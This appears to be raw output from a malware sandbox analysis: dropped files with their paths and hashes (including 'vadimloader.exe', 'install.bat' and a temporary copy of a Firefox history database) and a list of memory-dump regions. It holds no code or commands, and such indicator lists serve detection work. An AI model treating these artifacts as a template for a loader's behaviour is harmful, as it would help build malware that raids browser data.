dc702f4100ed835e198507cd06fa5389a063d4600fc08be780690d729ab62114fd5e5b201d511b5832c14e90a5975ed574fc96edb5a9ab9eb83f607c7a712c7f

Download Submit
C:\Users\Admin\AppData\Local\Temp\ONEFIL~1\_hashlib.pyd
Filesize
63KB

MD5
f495d1897a1b52a2b15c20dcecb84b47

SHA1
8cb65590a8815bda58c86613b6386b5982d9ec3f

SHA256
e47e76d70d508b62924fe480f30e615b12fdd7745c0aac68a2cddabd07b692ae

SHA512
725d408892887bebd5bcf040a0ecc6a4e4b608815b9dea5b6f7b95c812715f82079896df33b0830c9f787ffe149b8182e529bb1f78aadd89df264cf8853ee4c4

Download Submit
C:\Users\Admin\AppData\Local\Temp\ONEFIL~1\_socket.pyd
Filesize
81KB

MD5
899380b2d48df53414b974e11bb711e3

SHA1
f1d11f7e970a7cd476e739243f8f197fcb3ad590

SHA256
b38e66e6ee413e5955ef03d619cadd40fca8be035b43093d2342b6f3739e883e

SHA512
7426ca5e7a404b9628e2966dae544f3e8310c697145567b361825dc0b5c6cd87f2caf567def8cd19e73d68643f2f38c08ff4ff0bb0a459c853f241b8fdf40024

Download Submit
C:\Users\Admin\AppData\Local\Temp\ONEFIL~1\_ssl.pyd
Filesize
173KB

MD5
9b4e74fd1de0f8a197e4aa1e16749186

SHA1
833179b49eb27c9474b5189f59ed7ecf0e6dc9ea

SHA256
a4ce52a9e0daddbbe7a539d1a7eda787494f2173ddcc92a3faf43b7cf597452b

SHA512
ae72b39cb47a859d07a1ee3e73de655678fe809c5c17ffd90797b5985924ddb47ceb5ebe896e50216fb445526c4cbb95e276e5f3810035b50e4604363eb61cd4

Download Submit
C:\Users\Admin\AppData\Local\Temp\ONEFIL~1\_wmi.pyd
Filesize
35KB

MD5
ee33f4c8d17d17ad62925e85097b0109

SHA1
8c4a03531cf3dbfe6f378fdab9699d51e7888796

SHA256
79adca5037d9145309d3bd19f7a26f7bb7da716ee86e01073c6f2a9681e33dad

SHA512
60b0705a371ad2985db54a91f0e904eea502108663ea3c3fb18ed54671be1932f4f03e8e3fd687a857a5e3500545377b036276c69e821a7d6116b327f5b3d5c1

Download Submit
C:\Users\Admin\AppData\Local\Temp\ONEFIL~1\certifi\cacert.pem
Filesize
287KB

MD5
2a6bef11d1f4672f86d3321b38f81220

SHA1
b4146c66e7e24312882d33b16b2ee140cb764b0e

SHA256
1605d0d39c5e25d67e7838da6a17dcf2e8c6cfa79030e8fb0318e35f5495493c

SHA512
500dfff929d803b0121796e8c1a30bdfcb149318a4a4de460451e093e4cbd568cd12ab20d0294e0bfa7efbd001de968cca4c61072218441d4fa7fd9edf7236d9

Download Submit
C:\Users\Admin\AppData\Local\Temp\ONEFIL~1\charset_normalizer\md.pyd
Filesize
10KB

MD5
d9e0217a89d9b9d1d778f7e197e0c191

SHA1
ec692661fcc0b89e0c3bde1773a6168d285b4f0d

SHA256
ecf12e2c0a00c0ed4e2343ea956d78eed55e5a36ba49773633b2dfe7b04335c0

SHA512
3b788ac88c1f2d682c1721c61d223a529697c7e43280686b914467b3b39e7d6debaff4c0e2f42e9dddb28b522f37cb5a3011e91c66d911609c63509f9228133d

Download Submit
C:\Users\Admin\AppData\Local\Temp\ONEFIL~1\charset_normalizer\md__mypyc.pyd
Filesize
120KB

MD5
bf9a9da1cf3c98346002648c3eae6dcf

SHA1
db16c09fdc1722631a7a9c465bfe173d94eb5d8b

SHA256
4107b1d6f11d842074a9f21323290bbe97e8eed4aa778fbc348ee09cc4fa4637

SHA512
7371407d12e632fc8fb031393838d36e6a1fe1e978ced36ff750d84e183cde6dd20f75074f4597742c9f8d6f87af12794c589d596a81b920c6c62ee2ba2e5654

Download Submit
C:\Users\Admin\AppData\Local\Temp\ONEFIL~1\libcrypto-3.dll
Filesize
4.9MB

MD5
51e8a5281c2092e45d8c97fbdbf39560

SHA1
c499c810ed83aaadce3b267807e593ec6b121211

SHA256
2a234b5aa20c3faecf725bbb54fb33f3d94543f78fa7045408e905593e49960a

SHA512
98b91719b0975cb38d3b3c7b6f820d184ef1b64d38ad8515be0b8b07730e2272376b9e51631fe9efd9b8a1709fea214cf3f77b34eeb9fd282eb09e395120e7cb

Download Submit
C:\Users\Admin\AppData\Local\Temp\ONEFIL~1\libssl-3.dll
Filesize
771KB

MD5
bfc834bb2310ddf01be9ad9cff7c2a41

SHA1
fb1d601b4fcb29ff1b13b0d2ed7119bd0472205c

SHA256
41ad1a04ca27a7959579e87fbbda87c93099616a64a0e66260c983381c5570d1

SHA512
6af473c7c0997f2847ebe7cee8ef67cd682dee41720d4f268964330b449ba71398fda8954524f9a97cc4cdf9893b8bdc7a1cf40e9e45a73f4f35a37f31c6a9c3

Download Submit
C:\Users\Admin\AppData\Local\Temp\ONEFIL~1\select.pyd
Filesize
30KB

MD5
bffff83a000baf559f3eb2b599a1b7e8

SHA1
7f9238bda6d0c7cc5399c6b6ab3b42d21053f467

SHA256
bc71fbdfd1441d62dd86d33ff41b35dc3cc34875f625d885c58c8dc000064dab

SHA512
3c0ba0cf356a727066ae0d0d6523440a882aafb3ebdf70117993effd61395deebf179948f8c7f5222d59d1ed748c71d9d53782e16bd2f2eccc296f2f8b4fc948

Download Submit
C:\Users\Admin\AppData\Local\Temp\ONEFIL~1\unicodedata.pyd
Filesize
1.1MB

MD5
a1388676824ce6347d31d6c6a7a1d1b5

SHA1
27dd45a5c9b7e61bb894f13193212c6d5668085b

SHA256
2480a78815f619a631210e577e733c9bafecb7f608042e979423c5850ee390ff

SHA512
26ea1b33f14f08bb91027e0d35ac03f6203b4dfeee602bb592c5292ab089b27ff6922da2804a9e8a28e47d4351b32cf93445d894f00b4ad6e2d0c35c6c7f1d89

Download Submit
C:\Users\Admin\AppData\Local\Temp\ONEFIL~1\zstandard\backend_c.pyd
Filesize
513KB

MD5
478583eb2f71fa1793829fbde4246bab

SHA1
d67331acf14354cfa4cf9ab3a3e0bc2e1288bcf9

SHA256
8c7c7929d3a2742f0407619da235d5b298882cc4c7ede3666ac21e9db22f8347

SHA512
f4e01565632756036eb38d9663295836b2379b8c4b57de7704a6ee7a24dbcb5a12506ac51d2540991f8fff53ffac1f6fa56814b3a009db6b0cc9f18ab3578fc5

Download Submit
C:\Users\Admin\AppData\Local\Temp\Save-IMMtHriU6xp.zip
Filesize
2KB

MD5
aa55556d81786b211069e486aab546f9

SHA1
522a9c1e64eae1632eb5d228b76aae92b2d3afc0

SHA256
d0571063538169f5bd2db0796e65967ea5556b4d08233ed13dab7976d3daf1d2

SHA512
42a45966a31a2650a9967fb365c5e90ac81b47eae66b5859474bc9474da95433465d6df0c147b6b20924c3146dc31ee101fd25b2bc2ef073ae9fd104662805f4

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_pycj0qlc.mg3.ps1
Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\install.bat
Filesize
568B

MD5
e861a08036b9eb5f216deb58e8a7934d

SHA1
5f12dd049df2f88d95f205a4adc307df78ac16ee

SHA256
e8315164849216f4c670c13b008e063da2176efb5d08939caa321e39a33035eb

SHA512
7ea2fd3b085bd4b3e27d4dda36e079ec8910173cc2b33ccd06698051eb7d5f2818ed9000761d1fc44e354c06d015feb16e77958dab8a3969a0cee2fd453ca0c9

Download Submit
C:\Users\Admin\AppData\Local\Temp\onefile_872_133636606224686203\_lzma.pyd
Filesize
155KB

MD5
4e2239ece266230ecb231b306adde070

SHA1
e807a078b71c660db10a27315e761872ffd01443

SHA256
34130d8abe27586ee315262d69af4e27429b7eab1f3131ea375c2bb62cf094be

SHA512
86e6a1eab3529e600dd5caab6103e34b0f618d67322a5ecf1b80839faa028150c492a5cf865a2292cc8584fba008955da81a50b92301583424401d249c5f1401

Download Submit
C:\Users\Admin\AppData\Local\Temp\onefile_872_133636606224686203\_queue.pyd
Filesize
31KB

MD5
6e00e0821bb519333ccfd4e61a83cb38

SHA1
3550a41bb2ea54f456940c4d1940acab36815949

SHA256
2ad02d49691a629f038f48fcdee46a07c4fcc2cb0620086e7b09ac11915ae6b7

SHA512
c3f8332c10b58f30e292676b48ecf1860c5ef9546367b87e90789f960c91eae4d462dd3ee9cb14f603b9086e81b6701aab56da5b635b22db1e758ed0a983e562

Download Submit
C:\Users\Admin\AppData\Local\Temp\onefile_872_133636606224686203\python312.dll
Filesize
6.6MB

MD5
5c5602cda7ab8418420f223366fff5db

SHA1
52f81ee0aef9b6906f7751fd2bbd4953e3f3b798

SHA256
e7890e38256f04ee0b55ac5276bbf3ac61392c3a3ce150bb5497b709803e17ce

SHA512
51c3b4f29781bb52c137ddb356e1bc5a37f3a25f0ed7d89416b14ed994121f884cb3e40ccdbb211a8989e3bd137b8df8b28e232f98de8f35b03965cfce4b424f

Download Submit
C:\Users\Admin\AppData\Local\Temp\onefile_872_133636606224686203\vadimloader.exe
Filesize
14.3MB

MD5
9f037593071344bc1354e5a619f914f4

SHA1
1d000b02ca751864296f225225c0cb0ba9b5129b

SHA256
db47e673cccdbe2abb11cc07997aeabf4d2bdc9bec286674b58c6baafa09b823

SHA512
355f29bb32579b941517c24fd3ebc02bafbafc8086f68546446f0c526439b4b9f8f83cf598cdde8c0489935cdc8b0e97aeece3b1964fb5c6c704f238f324d881

Download Submit
C:\Users\Admin\AppData\Local\Temp\onefile_872_133636606224686203\vcruntime140.dll
Filesize
106KB

MD5
4585a96cc4eef6aafd5e27ea09147dc6

SHA1
489cfff1b19abbec98fda26ac8958005e88dd0cb

SHA256
a8f950b4357ec12cfccddc9094cca56a3d5244b95e09ea6e9a746489f2d58736

SHA512
d78260c66331fe3029d2cc1b41a5d002ec651f2e3bbf55076d65839b5e3c6297955afd4d9ab8951fbdc9f929dbc65eb18b14b59bce1f2994318564eb4920f286

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\s2p9ahae.default-release\places.sqlite_tmp
Filesize
5.0MB

MD5
b971537746f906f1f03262ecf93597e6

SHA1
4f0ae66efd8c238fd0fb0a0a375be77f945c5b8c

SHA256
b828d17ec8f48ffbb2650b6fc0ca6b0a24b4910049c2bd9232c01a88bcdd4da4

SHA512
a3c73515491f86e415a0f095273a31235f911023fbf74777c4b4f1fbf72be4fe15938c6175c26f88ce121ef1a88de0bfda8dbc12a66b265c3782ea9f3e267d99

Download Submit
memory/532-65-0x0000000000640000-0x0000000000641000-memory.dmp

Filesize
4KB

Download
memory/532-67-0x0000000000640000-0x0000000000641000-memory.dmp

Filesize
4KB

Download
memory/776-620-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/776-618-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/776-619-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/776-617-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/776-621-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/776-614-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/776-615-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/776-609-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/776-616-0x0000000000620000-0x0000000000640000-memory.dmp

Filesize
128KB

Download
memory/776-610-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/776-613-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/776-687-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/776-612-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/776-611-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/776-750-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/1384-146-0x000002167C560000-0x000002167C582000-memory.dmp

Filesize
136KB

Download
memory/1856-17-0x0000000000B80000-0x000000000104E000-memory.dmp

Filesize
4.8MB

Download
memory/1856-3-0x0000000000B80000-0x000000000104E000-memory.dmp

Filesize
4.8MB

Download
memory/1856-5-0x0000000000B80000-0x000000000104E000-memory.dmp

Filesize
4.8MB

Download
memory/1856-1-0x0000000077B94000-0x0000000077B96000-memory.dmp

Filesize
8KB

Download
memory/1856-2-0x0000000000B81000-0x0000000000BAF000-memory.dmp

Filesize
184KB

Download
memory/1856-0-0x0000000000B80000-0x000000000104E000-memory.dmp

Filesize
4.8MB

Download
memory/3156-66-0x0000000000400000-0x0000000000450000-memory.dmp

Filesize
320KB

Download
memory/3200-1797-0x0000000000420000-0x00000000008EE000-memory.dmp

Filesize
4.8MB

Download
memory/3200-1828-0x0000000000420000-0x00000000008EE000-memory.dmp

Filesize
4.8MB

Download
memory/3492-494-0x000001E2259A0000-0x000001E2259AA000-memory.dmp

Filesize
40KB

Download
memory/3492-493-0x000001E2259B0000-0x000001E2259C2000-memory.dmp

Filesize
72KB

Download
memory/3532-585-0x0000027844A10000-0x0000027844A1A000-memory.dmp

Filesize
40KB

Download
memory/3532-550-0x0000027844870000-0x000002784487A000-memory.dmp

Filesize
40KB

Download
memory/3532-560-0x00000278449E0000-0x00000278449FC000-memory.dmp

Filesize
112KB

Download
memory/3532-572-0x00000278449C0000-0x00000278449CA000-memory.dmp

Filesize
40KB

Download
memory/3532-573-0x0000027844A20000-0x0000027844A3A000-memory.dmp

Filesize
104KB

Download
memory/3532-583-0x00000278449D0000-0x00000278449D8000-memory.dmp

Filesize
32KB

Download
memory/3532-548-0x0000027844790000-0x00000278447AC000-memory.dmp

Filesize
112KB

Download
memory/3532-584-0x0000027844A00000-0x0000027844A06000-memory.dmp

Filesize
24KB

Download
memory/3532-549-0x00000278447B0000-0x0000027844865000-memory.dmp

Filesize
724KB

Download
memory/3724-608-0x0000000140000000-0x000000014000E000-memory.dmp

Filesize
56KB

Download
memory/3724-605-0x0000000140000000-0x000000014000E000-memory.dmp

Filesize
56KB

Download
memory/3724-604-0x0000000140000000-0x000000014000E000-memory.dmp

Filesize
56KB

Download
memory/3724-603-0x0000000140000000-0x000000014000E000-memory.dmp

Filesize
56KB

Download
memory/3724-602-0x0000000140000000-0x000000014000E000-memory.dmp

Filesize
56KB

Download
memory/3724-601-0x0000000140000000-0x000000014000E000-memory.dmp

Filesize
56KB

Download
memory/3944-273-0x0000000000120000-0x0000000000176000-memory.dmp

Filesize
344KB

Download
memory/3944-275-0x0000000000120000-0x0000000000176000-memory.dmp

Filesize
344KB

Download
memory/4376-237-0x0000000000400000-0x0000000000441000-memory.dmp

Filesize
260KB

Download
memory/4452-19-0x0000000000421000-0x000000000044F000-memory.dmp

Filesize
184KB

Download
memory/4452-20-0x0000000000420000-0x00000000008EE000-memory.dmp

Filesize
4.8MB

Download
memory/4452-447-0x0000000000420000-0x00000000008EE000-memory.dmp

Filesize
4.8MB

Download
memory/4452-3014-0x0000000000420000-0x00000000008EE000-memory.dmp

Filesize
4.8MB

Download
memory/4452-2743-0x0000000000420000-0x00000000008EE000-memory.dmp

Filesize
4.8MB

Download
memory/4452-2482-0x0000000000420000-0x00000000008EE000-memory.dmp

Filesize
4.8MB

Download
memory/4452-2160-0x0000000000420000-0x00000000008EE000-memory.dmp

Filesize
4.8MB

Download
memory/4452-171-0x0000000000420000-0x00000000008EE000-memory.dmp

Filesize
4.8MB

Download
memory/4452-1979-0x0000000000420000-0x00000000008EE000-memory.dmp

Filesize
4.8MB

Download
memory/4452-1685-0x0000000000420000-0x00000000008EE000-memory.dmp

Filesize
4.8MB

Download
memory/4452-1414-0x0000000000420000-0x00000000008EE000-memory.dmp

Filesize
4.8MB

Download
memory/4452-1163-0x0000000000420000-0x00000000008EE000-memory.dmp

Filesize
4.8MB

Download
memory/4452-993-0x0000000000420000-0x00000000008EE000-memory.dmp

Filesize
4.8MB

Download
memory/4452-792-0x0000000000420000-0x00000000008EE000-memory.dmp

Filesize
4.8MB

Download
memory/4452-267-0x0000000000420000-0x00000000008EE000-memory.dmp

Filesize
4.8MB

Download
memory/4452-265-0x0000000000420000-0x00000000008EE000-memory.dmp

Filesize
4.8MB

Download
memory/4452-262-0x0000000000420000-0x00000000008EE000-memory.dmp

Filesize
4.8MB

Download
memory/4452-260-0x0000000000420000-0x00000000008EE000-memory.dmp

Filesize
4.8MB

Download
memory/4452-18-0x0000000000420000-0x00000000008EE000-memory.dmp

Filesize
4.8MB

Download
memory/4452-21-0x0000000000420000-0x00000000008EE000-memory.dmp

Filesize
4.8MB

Download
memory/4636-276-0x0000000000420000-0x00000000008EE000-memory.dmp

Filesize
4.8MB

Download
memory/4636-272-0x0000000000420000-0x00000000008EE000-memory.dmp

Filesize
4.8MB

Download
memory/4660-46-0x0000000005BA0000-0x0000000005CAA000-memory.dmp

Filesize
1.0MB

Download
memory/4660-45-0x0000000006920000-0x0000000006F38000-memory.dmp

Filesize
6.1MB

Download
memory/4660-41-0x0000000000DF0000-0x0000000000E40000-memory.dmp

Filesize
320KB

Download
memory/4660-42-0x0000000005D50000-0x00000000062F4000-memory.dmp

Filesize
5.6MB

Download
memory/4660-43-0x0000000005840000-0x00000000058D2000-memory.dmp

Filesize
584KB

Download
memory/4660-40-0x00000000737AE000-0x00000000737AF000-memory.dmp

Filesize
4KB

Download
memory/4660-44-0x00000000059F0000-0x00000000059FA000-memory.dmp

Filesize
40KB

Download
memory/4660-48-0x0000000005B30000-0x0000000005B6C000-memory.dmp

Filesize
240KB

Download
memory/4660-159-0x00000000063E0000-0x0000000006446000-memory.dmp

Filesize
408KB

Download
memory/4660-47-0x0000000005AD0000-0x0000000005AE2000-memory.dmp

Filesize
72KB

Download
memory/4660-49-0x0000000005CB0000-0x0000000005CFC000-memory.dmp

Filesize
304KB

Download
memory/4660-239-0x0000000007450000-0x00000000074A0000-memory.dmp

Filesize
320KB

Download
memory/4812-266-0x00007FF785DD0000-0x00007FF786406000-memory.dmp

Filesize
6.2MB

Download
memory/4812-274-0x00007FF785DD0000-0x00007FF786406000-memory.dmp

Filesize
6.2MB

Download
memory/5080-247-0x00000000095B0000-0x0000000009772000-memory.dmp

Filesize
1.8MB

Download
memory/5080-170-0x0000000000400000-0x0000000000470000-memory.dmp

Filesize
448KB

Download
memory/5080-238-0x0000000008D00000-0x0000000008D76000-memory.dmp

Filesize
472KB

Download
memory/5080-240-0x0000000007950000-0x000000000796E000-memory.dmp

Filesize
120KB

Download
memory/5080-250-0x0000000009CB0000-0x000000000A1DC000-memory.dmp

Filesize
5.2MB

Download